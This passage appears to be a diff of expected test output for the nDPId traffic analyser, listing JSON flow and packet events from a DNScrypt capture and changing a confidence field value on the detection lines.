01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAIcKehAAH4Ra2AKAAABa6o5ItRnAbsCCGeiszEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAXcKekgAH4Rh58KAAABa6o5IteRAbsGBOOGsy4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":528,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396111} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":528,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAABQKekAuX4RrHIKAAABa6o5IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAIcKepAAH4Ra14KAAABa6o5Io3vAbsCCGeisy8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAIcKetAAH4Ra10KAAABa6o5IpGnAbsCCGeisy0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAXcKewgAH4Rh5wKAAABa6o5IoF3AbsGBDmjsywBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAXcKe0gAH4Rh5sKAAABa6o5IqSdAbsGBBZ5szABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA